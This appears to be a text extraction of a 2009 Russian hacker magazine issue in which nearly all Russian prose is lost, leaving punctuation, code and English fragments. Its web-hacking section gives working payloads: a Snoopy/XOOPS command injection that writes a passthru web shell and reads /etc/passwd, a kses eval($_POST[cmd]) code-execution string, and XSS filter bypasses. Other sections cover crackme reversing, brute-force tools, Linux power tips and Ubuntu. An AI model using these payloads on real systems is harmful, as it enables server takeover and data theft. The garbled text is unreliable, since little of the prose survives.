(http://google.com/codesearch), WordPress, TikiWiki, Xoops , , .
_httpsrequest():
function _httpsrequest($url,$URI,$http_method,
$content_type="",$body="")
{
...

$safer_URI = strtr( $URI, "\"", " " ); // strip
quotes from the URI to avoid shell access

exec($this->curl_path." -D \$headerfile\
"".$cmdline_params." \"".$safer_URI.""\
"",$results,$return);
...
}
WordPress
escapeshellcmd. , ?
1. evil- $URI, ;
2. evil- exec.
, , ,
, ? !

backticks ( ). :
echo "'id'"
'id', x 01 /121/ 09
id. ,
XOOPS.

, xoops-1.3.10 (
) :
1. ./html/class/snoopy.class.php, _httpsrequest()
fetch();
2. ./class/phpsyndication.lib.php
:
require(XOOPS_ROOT_PATH."/class/snoopy.class.php");
...
function getData($forcecache=false)
{
...
$snoopy = new Snoopy;
...
$snoopy->fetch($this->sourceUrl);
$data = $snoopy->results;
...
}
function getHtml($fromcache=false)
{
$data = $this->getData($fromcache);
...
function getTitle($fromcache=false)
{
$data = $this->getData($fromcache=false);
getTitle() getHtml();
3. ./html/modules/headlines/blocks/headlines.
php :
<?php
...
include(XOOPS_ROOT_PATH."/class/phpsyndication.lib.
php");
...
$result = $xoopsDB->query("SELECT hid, sitename,
url, headlinesurl, status FROM ".$xoopsDB->
prefix("headlines").
" WHERE status=1 OR status=2");
...
$block['content'] .= "<b>".$synd->getTitle()."</b><br
/>";
$block['content'] .= $synd->getHtml();
...
?>
063
>>
SpellChecker TinyMCE
links
wiki.moxiecode.
com/index.php/
TinyMCE:Plugins/
spellchecker wiki
SpellChecker
TinyMCE.
securityfocus.com/
bid/31887 Snoopy
advisory.
snoopy.sourceforge.
net

Snoopy.
www.securityfocus.
com/archive/1/414573
Advisory Xoops,

Snoopy.
xoops.ru
Xoops.
064
,
getTitle() getHtml().
:
1. headlinesurl
https://'echo '<?passthru($cmd)?>' >> xox.php'
( headlines;
, );
2. XOOPS
headlines
URL;
3. ,
http://victim.com/xoops-1.3.10/html/class/
xox.php?cmd='cat /etc/passwd'.
, Snoopy
, , , . .

kses (PHP- ).
Kses ,
WordPress, Moodle, Drupal, eGroupware, Dokeos, PHP-Nuke,
Geeklog .
code exec
preg_replace /e:
function kses_bad_protocol_once($string,
$allowed_protocols){
return preg_replace('/^((&[^;]*;|[\sA-Za-z09])*)'.
'(:|:|&#[Xx]3[Aa];)\s*/e', 'kses_bad_
protocol_once2("\\1", $allowed_protocols)',
$string);
}
(,
phpinfo)
kses_bad_protocol_once() :
<a href="&#{${phpinfo()}};:">H4ck</a>
, WordPress ,
, ,
wp_kses_normalize_entities() : &
&
$string = str_replace('&', '&', $string);

WordPress ,
. , . ,
. ,
, Moodle.

.
:
$injection_points = array(
'blocks/rss_client/block_rss_client_error.
php' => array('error'),
'course/scales.php?id=1' => array('name',
'description'),
'help.php => array('text'),
'login/confirm.php' => array('data', 's'),
'mod/chat/gui_basic/index.php?id=1' =>
array('message'),
x 01 /121/ 09
>>
Snoopy
'mod/forum/post.php' => array('name'),

'mod/glossary/approve.php?id=1' => array('hook'),
'mod/wiki/admin.php' => array('page'),
XSS WordPress kses
(Opera) <a href="%0Bjavascript:alert(document.

domain)">lol</a>
(Firefox) <a href='%08data:text/html;base64,PHNjcmlwdD5
hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ%2B'>test</a>
- :
$value = '<img src=http&{${eval($_POST[cmd])}};://
target.ru>';
eval() :).
code exec , XSS. phpMyFaq , XSS kses
. .
XSS
kses
javascript kses_bad_
protocol_once2().
urldecode() %0B ( ) %08 ( ).
PoC ( ):
! kses
style, kses XSS,
CSS.
:
(Firefox) <a style=" ;\2d\6d\6f\7a\2d\62\69\6e\64\69\
6e\67: \75\72\6c(\68\74\74\70\3a\2F\2F\68\61\2E\63\6B\
65\72\73\2E\6F\72\67\2F\78\73\73\6D\6F\7A\2E\78\6D\6C
\23\78\73\73)" href="http://example.com">test</a>
.

, ,
advisory , . z
WP kses
x 01 /121/ 09
065
>>

PE-, Win32
. , , . ,
, / IDA Pro.
,
, Potable Executable (,
, PE).
. , ,

(, ).

, .
ntoskrnl.exe,
//. , ,
Windows (
wine) , ,
.
(
)
crackme (kpnc.org/ftp/KedaH3.zip),
(IDA Pro, OllyDbg, HIEW, etc).
, .
066
PE- , (raw)
. ,
: ,
. (physical)
(virtual).
,
, ,
PE-, . (
) , -
,
,
/ .
, , (Virtual Size
Physical Size) .
, , PE-. ,
10h , 100h,
/ 1000h. , ,
10h . x 01 /121/ 09
>>
KedaH3.exe, ,

HIEW

, IDA Pro KedaH3.exe

KedaH3.exe
100%
( , , PE-
). ,
, 10h
, ... ? ,
.
. ,
10h . , .
,
. , IDA Pro (
5.3 ), HIEW,
DUMPBIN .

, ,
. .
( ), .
. ,
, , , .
, . ,
( W2K, S2K3 XP),
- .no pain no gain. : condomprinciple: itd rather have one and not need it that need it and not have one.
, condom ,
. , crack-me
MessageBoxA.
HIEW , ; ,
HEX-mode (<ENTER>)
<F8> (Header), <F5> (Entry). ... ! ,
. , . ,
401010h, 10h
x 01 /121/ 09
.text, ,
<F8>.
! HIEW ! . : The input file contains
non-empty TLS (Thread Local Storage) callback table. However, IDA Pro
couldnt find the TLS callback procedures in the loaded code TLS callback, IDA Pro
TLS callback .
, , .
KedaH3.exe IDA Pro RETN,
.text:00401000 _text segment para public 'CODE' use32
.text:00401000
assume cs:_text
.text:00401000 ;org 401000h
.text:00401000 assume es:nothing, ss:nothing, ds:_data,
fs:nothing, gs:nothing
.text:00401000
retn
.text:00401000
.text:00401001
dd 3 dup(?)
.text:0040100D
db 3 dup(?)
.text:00401010
public start
.text:00401010 start dd 8 dup(?)
.text:00401010 _text ends
, , RET,
, - .
MessageBoxA? ? ! TLS Callback
, , , .
KedaH3.exe , ... .
, , , , 100% .
. (
, ),
, , , .
067
>>
KedaH3.exe HEX- ,
- ,
(manual load) ,
IDA Pro 5.3
, KedaH3.exe (
)
, ,
Windows.

HIEW. , HEX- .
/ ,
/
HEX-. .
( , ?)
,
.
, (
401000h) <ENTER> . - ,
(RETN) , HIEW
.
. , HIEW , , ,
. crack-me HIEW .
HIEW , .
, , . , . ,
ENTER,
Manual Load, Load File of New
Format, . , !
IDA Pro 5.2 , 5.3, ,
,
.
KedaH3.exe, IDA Pro 5.3

00401010 public start
00401010 start proc near
00401010
dec
eax
00401011
retn
00401011 start endp
00401011
00401012 loc_401012:

; CODE XREF: .text:00401049vj
00401012
push
offset a_noPainNoGain_

; " .no pain no gain. "
00401017
push
offset unk_403018
068
HIEW ,
,

0040101C
push
0
0040101E
call
ds:MessageBoxA
00401024
xor
eax, eax
00401026
mov
eax, [eax]
00401028
db
65h
00401028
jp
short near ptr dword_4010A0
0040102B
insd
00401030
00401030 public TlsCallback_0
00401030 TlsCallback_0:

; CODE XREF: .text:0040103Bvj
00401030
mov
esi, esp
00401032
lodsd
00401033
lodsd
00401034
mov
al, 10h
00401036
mov
ah, al
00401038
xchg
eax, esi
00401039
lodsb
0040103A
dec
eax
0040103B
jnp
short TlsCallback_0
0040103D
xor
eax, eax
0040103F
push
eax
00401040
mov
al, 30h
00401042
mov
esi, fs:[eax]
00401045
inc
esi
00401046
dec
byte ptr [esi+1]
00401049
jnp
short loc_401012
0040104B
xor
eax, eax
0040104D
mov
eax, [eax]
0040104D
0040104D ; ------------------------------------------00403000 a_noPainNoGain_ db ' .no pain no gain. ', 0

; DATA XREF: loc_401012^o
00403018 aCondomPrincipl db 0Ah

; DATA XREF: .text:00401017^o
00403018
db 'condom-principle',0Ah, 0Ah
00403018
db 9,'it',27h,'d rather have one and not
need it... '
x 01 /121/ 09
>>
KedaH3.exe IDA Pro 5.3 (

)
00403071 TlsIndx
db 'http://kpnc.org',0

; DATA XREF: .data:TlsIndex_ptrvo
KedaH3.exe
00403090 TlsDirectory dd offset TlsDirectory

; DATA XREF: .data:TlsDirectoryvo
00403094 TlsEnd_ptr
dd offset TlsDirectory
. KedaH3.exe , 00403098 TlsIndex_ptr dd offset TlsIndex
<F12> (Pause), TLS Callback
<Ctrl-G> (Goto), 401030 ( TLS Callback
; "http://kpnc.org"
IDA).
0040309C TlsCallbacks_ptr dd offset
401030
TlsSizeOfZeroFill
Breakpoint, Hardware, on execution.
Debug Hardware breakpoints, ,
004030A0 TlsSizeOfZeroFill dd offset
, <CTRLTlsCallback_0
F2> (Restart),
Yes
004030A4 TlsCharacteristics dd 0
TLS Callback,
!
... .
IDA Pro Debugger
DEC EAX/RET, ( 5.3).
. , ,
<CTRL-E>
.
TlsCallback_0, <F2>
( , ?),
<F9>. ! TLS callback ,
, .
, TLS callback . ,
crack-me !
, (, ?),
, !
, . ,
,

00401049 jnp short loc_401012 .
,
.
.
( ) . , CALL ds:MessageBoxA
:
XOR EAX, EAX/MOV EAX,
[EAX], .
1. ,
SEH- ( )
2. XOR EAX, EAX/MOV EAX, [EAX]
, RET
...
3. PE- .
/
! ?

. , .
condom-principle... http://
, ?
kpnc.org, ,
. . . :
PAUSE - MessageBoxA URL? ,
. ,
, Windows ...
, TLS
callback crack-me, , .
, ,
, ,
( ,
, crack-me
).
.z
x 01 /121/ 09
links
Microsoft Portable
Executable and
Common Object File
Format Specification:
microsoft.com/whdc/
system/platform/
firmware/PECOFF.
mspx.
KedaH3 Crack
Me: kpnc.org/ftp/
KedaH3.zip.
069
>>
R0id
/ r0id@bk.ru /

: Skype Bruter
: *nix/win
: mr.The
.

:).
P.S. PHP
. ,
, .
: InVizer
: Windows 2000/XP
: & JaH
/
/
.

.
.
!
GUI- , , !

- Skype-,
.
,
Skype- $1. ,
:
. ,
Skype Bruter,
:).

PHP curl.
base.txt :
https- proxy.
txt. ,
:
base.txt
:
log.txt
ua.txt (
)
proxy.txt -
sk.php
, ,
: ,
070
5. /

6.
<Ctrl+Z>
7.
8.
9.
10.
11.

: StaffCop
: Windows 2000/XP
: staffcop.ru

. ,

, ?
:). ,

InVizer.
ICQ-
:
1. ( log.txt)
2. icq-
3. timeout (
)
4. ( )

/ -,

:).
StaffCop,

. ,

,
/ .
:
1. .
, ,
x 01 /121/ 09
>>
- , .
.
2. .

. ,
.
.
3. -.
- . URL-,
( title), .
, :).
, ,
, .
4. ICQ MSN Messenger.
IM
(ICQ MSN) UIN ICQ MSN,
,
( ),
.

.
5. USB-. , USB, .
6.
. / (aka
) .
.
.
7. .
(aka ) .
, Windows
:).
, , ,
,
. , ,

, .
: GetBrute
: Windows 2000/XP
: dimas

URL, -. ,
.

GetBrute,
GET- url.
aka data.
ini,
:
1. [connection]:
url (
* , ^
).
HandleRedirects 0 1 1,
403.
x 01 /121/ 09
-
Timeout , 0 (0 ).
2. [ident]:
good , ,
.
bad ,
.
3. [files]:
decrease 0 1 , 0, brute.txt
, 1.
readgood 0 1 , 0 good.txt
,
,
1.
,
good.txt (), bad.txt (-)
error.txt (). , aka errors
, ,
,
ident, good
bad.
:
ESC ;
SPACE .

, ,

.
: Find proxies for Me
: Windows 2000/XP
: NemeZz
, ,
:). ,
-, ,
. ,
proxy4free.com/page1.html , :
67.69.254.244:80

anonymous

Canada

2008-12-01

Whois
218.14.227.198:3128

anonymous

China

2008-12-01

Whois
60.10.59.76:3128

anonymous

China

2008-12-01

Whois
61.55.135.1:80

anonymous

China

2008-12-01

Whois
61.166.68.71:80

high anonymity

China

2008-12-01

Whois
202.98.23.114:80

anonymous

China

2008-12-01

Whois
208.62.125.146:80

high anonymity

United States

2008-12-02

Whois
89.234.27.15:80

anonymous

Great Britain (UK)

2008-12-02

Whois
202.98.23.116:80

anonymous

China

2008-12-02

Whois
,
/PHP, ,
Find proxies
for Me,
.
, :
1. (
txt/html/htm/mht
, )
2. (
)
3.
4.
5. IP (
IP aaa,bbb,ccc,ddd<=255,
eeeee<=65536)
DVD. z
071
>>
Mifrill
/ mifrill@riddick.ru /

Web 2.0. . , ,
, Web 2.0 . , ,
,
. , ...
-, ... , . .
, . , ,
.
. , .
, , .
,
! , -
072
MUD ,
, . : ( mmorpg massively
multiplayer online role-playing game) .
World of warcraft, Lineage II, EVE online ()
Second Life.
, , - Sims, ,
. ,
x 01 /121/ 09
>>
2008 Second Life

Technology & Engineering
Emmy Awards
Second Life
, BusinessWeek The Economist.

,
, ,
. , .
(Philip Rosedale). ,
,
.
, ,
, - , , , .
, 6-7 ( Apple II)
.
17 .

. 1994,
, . , ,
-. ,
.
, ,
. , , ,
! , .
90 3D
,
, , , (,
Second Life ).
.
,
. , , -.
, ,
,
. , ,
,
, .
, .
x 01 /121/ 09
, .
FreeVue,
.
,
RealNetworks
(Rob Glaser), 1996 .
, ,
RealNetworks.
, ,
, , .
, ,
. , ,
, .
1999. ,
,
RealNetworks, Linden Alley
. ,
Linden Labs, . (Andrew Meadows),
... .
, . ,
, ,
- , , .
( ),

. ,
, .
- ,
. .
-
.
,
, .
, Second Life
,
.
( \)
.
,
; , ,
, . ,
- ?.. Second
Life ,
. ,
, ,
, . ,
Second Life .
( 2003 ) Linden Labs ,
. 31
,
. , 11,
.
,
. , , ,
, ,
, .
073
>>
, , , ,
, .
,
- ,
. Second Life , , , ,
. Second
Life ,
, , .
.
, Second Life , .
, , ,
, . , :
, !, .
Linden Labs Linden,
( ). -
.
Second Life ,
, .
, . , , ,
, ,
, . , 3D- Second
Life . 2003-
, ,

. ,
Second Life Ginko Financial,

$700.000 .
Linden Labs ,
( ),
,
.
, , ,
.
, , , .
, ,
,
. , Linden Labs
, , ,
, .
.
, ,
:
, , ,
. , ,
074
,
. , , .
, Second Life
, ,
. ,
?
, ,
, Linden Labs
. , ,
-, Linden Labs x 01 /121/ 09
>>
,

, ,

. ,
,
, ,
.
- , . -
,
, . ,
.
. ,
, , x 01 /121/ 09
, .
. ,
Second Life . , , 15 ., , .
- , ,

. ;

45-50 . .
Second Life ,
,
... ,
. Second Life -
(
Linden Labs. , ). ,
.
, - ,
. ,
.
.
, Second Life (L$) . ,
280 .
, 2008 , , 22
. , Linden Labs

, ,
.
,
2007 . Second Life
Ginko Financial, $700.000
.
Linden Labs , ( ),
,
. , Linden Labs.
, ,
2007 . ,
, Linden Labs , . ,
.

, , ,
, .
Dell Sun
2007 .
. ,
,
. ,
Second Life 20062007 , , ,
( Reebok).
, ,

Second Life . , .
, Second Life
075
>>
, SL ,

, . ,
,
,
, .
,
,
.
, ,
(sic!)
, ,
. ,
.
. ,
, . ,
Second Life. ,
. ,
300
, , Linden Labs .
,
. ,
.
, .
, ,
. 5 10,
, .
Second Life
: , ,
, , , , ,
.
, , . Second
Life : , , ,
, , , , . , , ,
Second Life ,

. Linden Labs
, L$ ,
, . , .
, ,
:).
, ,
,
. ,
Second Life . , ,
.
,
,
. ,
Linden Labs. ,
, , ,
PG ,
.
( ,
,
) ID, -
076
Second Life,
, . ,
. , , , .
, , ,
Second Life , ,
.
, , ,
,
, , ,
, . ,
Second Life ,
,
. , , . , , Second Life
. - ,
, .
.
, . ,
, . ,
,
. , ,
, . , , , . z
x 01 /121/ 09
>>
>>

.

, moroz (moroz56@rambler.ru) . .
(ex-demon@inbox.lv) ,
.
, Kir Rost (dvar1@xakep.ru).
- , (beldimonau@mail.ru).
. .
, glowren (glowren@yandex.ru).

(naviero@rambler.rul) .
078
x 01 /121/ 09
>>
magazine@real.xakep.ru
( )
!
,
, ,
(karapanov@mail.ru) - .
, , (a.i.melnichenko@mail.ru)
.
(sergeyvmk@gmail.com)
.
ua (traffshow@gmail.com) .
(el_griton@inbox.ru)
.
, Robert Schweppes (r.schweppes@gmail.com)

.
x 01 /121/ 09
079

1 2009
2008
!
www.gameland-award.ru
Metal Gear Solid 4: Guns of the Patriots

Command & Conquer: Red Alert 3
Tomb Raider: Underworld
Super Smash Bros. Brawl
Guitar Hero: World Tour
Grand Theft Auto IV
LittleBigPlanet
Prince of Persia
Devil May Cry 4
Soul Calibur IV
Gears of War 2
Mirrors Edge
Fallout 3
Fable II
2009

>> unixoid
j1m
/ zobnin@gmail.com /
,
. 20
,
.
.
. (
) , .
, Linux ,

.
hdparm:
# hdparm -B 1 -S 12 /dev/sda
-B 1
. 254 :
1 127 ,
.
,
hdparm -i /dev/sda
AdvancedPM. -S 12 ,
60 .
255 : 1 240
5 , 0 .
, ,
,
.
, . , :
:
082
# echo 5 > /proc/sys/vm/laptop_mode

# echo 'vm.laptop_mode=5' >> /etc/sysctl.conf
,
, .
, ,
.

( ,
,
) 5 15 30:
# echo 1500 > /proc/sys/vm/dirty_writeback_centisecs
# echo 'vm.dirty_writeback_centisecs=1500'
syslogd.

(
). ,
/etc/syslog.conf.
atime .

( POSIX).
,
.
, . atime
noatime :
x 01 /121/ 09
>> unixoid
hdparm
PowerTOP
# mount -o remount,noatime /
# echo '/dev/ _ ext3 noatime 0 1'
>> /etc/fstab
noatime ,
.
,
, relatime.

,
. ,
, , /var/mail, . , .

(
, Ubuntu?).

(,
UPS). noatime

.
syslogd
.
LCD- . , -
. ,
- ,
,
. ,
, .
, . X.Org 7.3,
xbacklight, .
,
(70% ) :
# xbacklight -set 70
50% . cron ,
100% , 75% , 50% .
(, -
).
. , ,
, . . xrandr
, LCD- (LVDS):
# xrandr --output --off
, ,
, flash ( , )
, .
, ,
,
. , flash- , ,
- ,
, .
x 01 /121/ 09
,
,
3D-.

. Linux ,
. (P-state), . ,
, :
# ls /sys/devices/system/cpu/cpu0/cpufreq
, , .
:
# cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_
available_governors
083
>> unixoid
hdparm.conf ubuntu

Intel SpeedStep
. ,
.
( ) ,
.
# echo ondemand > /sys/devices/system/cpu/
cpu0/cpufreq/scaling_governor
,
:
info

Intel

:

,
,

, Enhanced Intel
SpeedStep.
084
# echo 1 > /sys/devices/system/cpu/sched_mc_

power_savings
,
. , ,
.
.
, ,
- 2-3
.
, Wake On
Lan .

. -
,
/ , .
, ,
,
.
Wake on Lan BIOS
ethtool:
# ethtool -s eth0 wol d
ethtool eth0, Wake-on

(g , d ).

, 1 / ( , ),
100 / ( 10
/). , ,

.
ethtool:
# ethtool -s eth0 autoneg off speed 100
autoneg off , speed 100

100 /.
(, ,
):
# ethtool -s eth0 autoneg on speed 1000
, WiFi- PS-Poll (Power Save Poll

protocol), , ,
, .
PS-Poll
x 01 /121/ 09
>> unixoid
. ,
.
,
,
. , -
, ,
:
# iwpriv eth1 set_power 5
,
. : 1 , , 5
, 6 .
, ,
.
WiFi-,
.
,
,
WiFi- :
# for i in 'find /sys -name "rf_kill"'; do echo 1 > $i;
done
:
# for i in 'find /sys -name "rf_kill"'; do echo 0 > $i; done
WiFi, - bluetooth, , ,
. ,
,
:
# hciconfig hci0 down
# rmmod hci_usb
, bluetooth-
USB-.
, DVD-
hdparm
Debian /etc/hdparm.conf,
.
. hdparm,
:
# vim /etc/hdparm.conf
/dev/sda {

apm = 1

spindown_time = 12
}
x 01 /121/ 09
Compaq Evo N620c

(Pentium M 1,3 GHz/1 Gb RAM/40 Gb HDD)
OpenBSD 4.4current, (600
MHz) ,
:
% sysctl hw | egrep 'model|speed'
hw.model=Intel(R) Pentium(R) M processor 1300MHz
(GenuineIntel 686class)
hw.cpuspeed=600
% apm
Battery state: high, 95% remaining, 0 minutes life
estimate
A/C adapter state: connected
. ,
, Gnome, KDE, XFCE -, hald,

. , hald
2 .

CD , :
# hal-disable-polling --device /dev/cdrom
. ,
. , ,
, -,
, .

AC97, . Linux-
, -
. ,
,
:
# echo 1 > /sys/module/snd_ac97_codec/parameters/power_
save
, , Intel HD Audio,
.
,
ALSA-. , :
# cat /sys/module/snd_hda_intel/parameters/power_save
. powertop (www.lesswatts.org/
projects/powertop)! ,

,
. z
085
>> unixoid
bober
/ zloy.bobr@gmail.com /
Ubuntu 8.10 KUbuntu 8.10:
, , Canonical Ubuntu 8.10. 8.04 LTS ,

very cutting release development
branch. , .

Ubuntu 4.10 Warty Warthog
(-) 20 2004 Debian, :
( ), , .
Just Work ( ) , ,
.
Debian

. ,
Distrowatch.com . 5.04
Hoary Hedgehog ( ), Ubuntu 1
- .
Ubuntu
Gnome. 2005 KDE,
, KDE Kubuntu,
. 5.10
Edubuntu, , 6.06
Xubuntu XFce, 7.04 Ubuntu Studio ( ),
8.04 Ubuntu Server Edition JeOS ( ).
, , (
). Ubuntu
, .
Ubuntu unstable- Debian,
APT , . -
086
,
. , Debian Multimedia
(debian-multimedia.org) Medibutu (www.medibuntu.org, Multimedia,
Entertainment & Distractions In Ubuntu). ,
source.list.
, (
) .
6.06 2 . .
Ubuntu 1,5 , 3.
6.06,
LTS (Long Term Support). (3
5 , ) , .
Ubuntu .
, ,
, 1,5 (
2010).

Ubuntu .
8.10.
Intrepid Ibex. ,
,
. , Intrepid Ibex
. ,
, ,
. ,
x 01 /121/ 09
>> unixoid

Update Manager
, .
Ubuntu 8.04, ,
.
LTS. KUbuntu 8.04 ,
( 2008) KDE 4 ,
( -
Kubuntu 8.04 KDE 4 Remix), KDE
3.5. .
Intrepid .
. KDE 3 Kubuntu 8.10
(KDE 4.1.2). KDE 4
Ibex KDE 3. ,
Amarok2, (
Mandriva 2009), Amarok. , , 8.04.
, .
: 2.6.27
Xen, X.Org 7.4
. ,
ecryptfs-utils,
.
, 0700 , :
$ sudo apt-get install ecryptfs-utils
~/Private:
LiveCD LiveUSB
Linux-
. DKMS
, -
Linux- ,
.
.
.
Last successful boot
.
PackageKit,
D-Bus. API,
. PackageKit
yum, apt, conary, zypp ..
, RedHat , service.
Ubuntu, ,
- :
$ sudo /etc/init.d/apache2[start|stop|restart]

:
$ sudo service apache2 [start|stop|restart]
, .
.
$ ecryptfs-setup-private
, !
. ,
, .
, .evolution/, ssh/, .gpg/:
$ mv ~/.evolution ~/Private
$ ln -s ~/Private/.evolution ~/.evolution
guest ( fast-user-switch-applet),
.
:
, , . ,
.
DKMS (Dynamic Kernel Module Support, linux.
dell.com/projects.shtml#dkms)
x 01 /121/ 09
8.04 , 8.10
. :
$ kdesudo adept_manager --dist-upgrade-devel
Adept (Version Upgrade).

, , updatemanager -d. New distribution release
8.10 is available. Upgrade . Kubuntu
,
:
$ sudo apt-get install update-manager
, . , ATI.
087
>> unixoid
GNOME
info

psubuntu.
com/wiki/
IntrepidReleaseNotes
, Alternate
PlayStation 3.
Ubuntu
Customization Kit
(uck.sourceforge.net)
, LiveCD- Ubuntu (
Kubuntu, Xubuntu
Edubuntu).
088
.
Nvidia,
X.Org 7.4,
. , Xmodmap X.Org.
KDE ,
, .
Kubuntu 8.04 KDE 4 Remix 8.10
kubuntu-desktop, kubuntu-kde4desktop
.

. : i386 x64, Desktop (LiveCD) Alternate (CD).
BitTorrent DVD- .
CD
.
, Windows Wubi (wubi-installer.org).
Ubuntu/KUbuntu 256
(Alternate) 384 (LiveCD) ,
, 4 (
XUbuntu ).
,
, .
, . ,

. Desktop 8.04
( ).
Ubuntu. ,
LiveCD
, Alternate
.
.
<F6>,
(acpi=off, nolapic,
noapic). (restricted) .
LiveCD-
. , (, )
.
Ubuntu
GNOME 2.24.1 Human
- ,
. ,
, ,
. . ,
LiveCD LiveUSB. Network Manager 0.7
3G- PPP/
PPPoE-.
.
SMB- Nautilus. , ,
. ,
(CD, USB), .
Rhythmbox Totem.
,
.
Totem ,
BBC (www.bbc.co.uk)
YouTube (www.youtube.com).
- File Roller,
(ALZ, RZIP, CAB, TAR, 7Z
).
Monitor Resolution
Settings
XrandR (X Resize and Rotate Extension, -,
-,
, ).
Synaptic
gnome-app-install. Synaptic
Quick Search,
, .
.
Software Sources source.list.

, 7 ( Kubuntu 6),
.
. Ubuntu Migration assistant,

Windows.
, -,
x 01 /121/ 09
>> unixoid
, GRUB ( hd0).
KUbuntu
, ,
KDE. ,
GNOME!
Plasma
KDE. ,
. , , ,
(, ,
).
, Mandriva 2009.
QuickAccess, ,

. QuickAccess
Dolphin ( 1.1), ,
, . , Dolphin
, .

<Ctrl>. .
+ - .
. , , KDE ,
. ,
, KWin (, ,
<Alt+Tab>). KDE
, Oxygen -
( ).
.
, Kickoff,
. , OpenOffice.org 3.0 2.4.1;
,
. , , Mandriva
2009, , 3.0.

Adept 3.0.
update-notifier-kde.
KDE 4 KDE 3
, KDE 3 Intrepid,
. ,
.
, . KDE 3
KDE 4 ,
, Gnome, XFce, IceWM.
sources.list :
Ubuntu 8.10
Kernel 2.6.27
X.Org 7.4
Compiz 0.7.8
GNOME 2.24.1
KDE 4.1.2
XFCE 4.4.2
OpenOffice.org 2.4.1
Firefox 3.0.3
Samba 3.2
Pidgin 2.5.2
Rhythmbox 0.11.6
$ sudo nano -w /etc/apt/sources.list
deb http://apt.pearsoncomputing.net/ intrepid main
deb-src http://apt.pearsoncomputing.net/ intrepid main
:
$ wget http://apt.pearsoncomputing.net/public.gpg
$ sudo apt-key add public.gpg
KDE:
$ sudo apt-get update
$ sudo apt-get dist-upgrade
$ sudo apt-get install kde3 jockey-kde
KDM.
:
$ sudo ln -s /usr/share/apps/kdm/themes/Krystal/ /usr/
share/apps/kdm/themes/kubuntu
network-manager.
, :
$ sudo apt-get remove knetworkmanager network-manager-kde
,
nm-applet:
$ sudo ln -s /usr/bin/nm-applet ~/.kde/Autostart/nm-applet
VM Builder
Intrepid Ibex
VM Builder, Xen, KVM VMware. ,
VM Builder Python. Ubuntu
8.10 .
,
Ubuntu,
,
VMware VMotion.
x 01 /121/ 09
, , Medibutu:
$ sudo wget www.medibuntu.org/sources.list.d/intrepid.
list \ -O /etc/apt/sources.list.d/medibuntu.list
, :
$ sudo apt-get update && sudo apt-get install medibuntukeyring
$ sudo apt-get update && sudo apt-get dist-upgrade
, KDE?
Neon (amarok.kde.org/en/node/482).
089
>> unixoid
KDE 4
( ) Amarok2 Kubuntu
( openSUSE),
KDE 4. sources.list :
$ sudo nano -w /etc/apt/sources.list
deb http://ppa.launchpad.net/project-neon/ubuntu
intrepid main
:
$ sudo apt-get update
$ sudo apt-get dist-upgrade
$ sudo apt-get install kde-nightly
8.10 , ,
, , ,
. Kubuntu 8.04 LTS,
.
. 23
2009 , (Jaunty Jackalope). ,
,
! z
Windows
, Neon ,
. .
, Kubuntu
Members (launchpad.net/~kubuntu-members).
:
deb http://ppa.launchpad.net/kubuntu-memberskde4/ubuntu hardy main multiverse restricted
universe/
Kubuntu Members KDE 4.1.1,

4.1.3.
090
x 01 /121/ 09
>> pc_zone
j1m
/ zobnin@gmail.com /
Tipsntricks

X Window
Firefox
( ~/.mozilla/firefox/_.default/chrome/userChrome.css):
* { font-size: 10pt !important }
.Xdefaults:
$ xrdb ~/.Xdefaults
Multimedia
DVD ,
700 :
$ mencoder dvd:// -ovc xvid -oac
mp3lame -xvidencopts \

bitrate=-700000 -o .avi
3gp:
$ ffmpeg -i .avi -s qcif -r 12
-ac 1 -ar 8000 \

-b 30 -ab 12 -.3gp
PDF- PNG- ( ):
$ convert .pdf -%03d.
png
$ convert *.png file.pdf
Shell

:
$ chmod -R a+X *
cdl,
:
$ echo function cdl() { cd $1; ls }
>> ~/.profile
:
$ cd +2
$ cd -3
FLV MPEG
mencoder:
$ mencoder youtube-.flv \
-ofps 15 -vf scale=300:-2 \
-oac lavc -ovc lavc -lavcopts \
vcodec=msmpeg4v2:acodec=mp3:\
abitrate=64 -o .avi
ZSH:
$ /tmp/nc-110/> cd 0 1
$ /tmp/nc-111/>
FLV MPEG ffmpeg:

$ ffmpeg -i youtube-.flv \
-sameq -ab 192 .avi
,
:
$ (cd /source/directory && tar cf - .
) | (cd /dest/directory && tar xvfp
-)
FLV SWF:
$ ffmpeg -i youtube-.flv \
swf-.swf

24x24:
$ mkfifo bmovl
$ convert .png .rgb
$ mplayer -vf bmovl=0:1:./bmovl
videoclip.avi
$ echo !"RGB24 24 24 10 10 0 1" >
bmovl
$ cat logo.rgb > bmovl
x 01 /121/ 09
cd
( Bash):
$ echo complete -d cd >> ~/.profile

, (>
file):
$ export NULLCMD=cat
$ export READNULLCMD=more
ZSH:
$ setopt autocd
$ alias -g ...='../..'
$ alias -g ....='../../..'
$ alias -g .....='../../../..'
GNU Screen
: Ctrl+A S
: Ctrl+A Tab
, : Ctrl+A Q
: Ctrl+A X
screen :
Ctrl+A F
Vim
vim:
:help!
:help 42
:help quotes
:help holy-grail
:
:set tabstop=4 shiftwidth=4
expandtab

:
:echo 0xea
vim
:
:scriptnames
ISO tar
( BSD):
$ tar -tf .iso
ISO Midnight
Commander <F3> ( ~/.mc/
bindings):
regex/\.(iso|ISO)$

View=%view{ascii} tar tvvf %f
, syslog :
# echo '*.* /dev/tty8' >> /etc/
syslog.conf z
091
>> coding

/ asterganster@gmail.com,
http://www.livedevice.com /
-
cURL Builder C++
-
-,
. ? , ,
, .
, libcurl C++ (Builder
6 C++ ). ,
libcurl: HTTP HTTPS, ,
, POST GET,
cookies. libcurl ,
, , .
cURL
cURL (client URL) 20 1998 .

(Daniel Stenberg). http://daniel.haxx.se.
, cURL? ? ,
,
-,

. cURL
092
API-.
cURL : cURL-
DLL Libcurl libcurl.dll . .
libcurl . FTP, FTPS, HTTP, HTTPS,
SCP, SFTP, TFTP, TELNET, DICT, LDAP, LDAPS, SSL, POST HTTP,
PUT HTTP; proxy (HTTP +
, Socs4, Socs5) , cookies
. , cURL
UNIX- , Mac OS X Windows.
http://curl.haxx.se.

libcurl Builder C++
, , ,
, Windows XP (, win32,
Windows2000). , , Builder 6 C++ (, ).
x 01 /121/ 09
>> coding
CURLOPT_WRITEDATA
, cURL
Download : http://curl.haxx.se/download.
html, Win32Generic
libcurl.
, libcurl,
. Bin
*.dll ( curl.exe ).
Bin Builder C++.
libcurl curl \Include\curl
, .
Include Builer C++. .
!
. easy
libcurl
,
Builder C++ libcurl
. Builder
button1, ,
. libcurl.dll libcurl
:
libcurl.dll
HINSTANCE cl = NULL;
if( ( cl = LoadLibrary( "libcurl.dll" ) ) ==
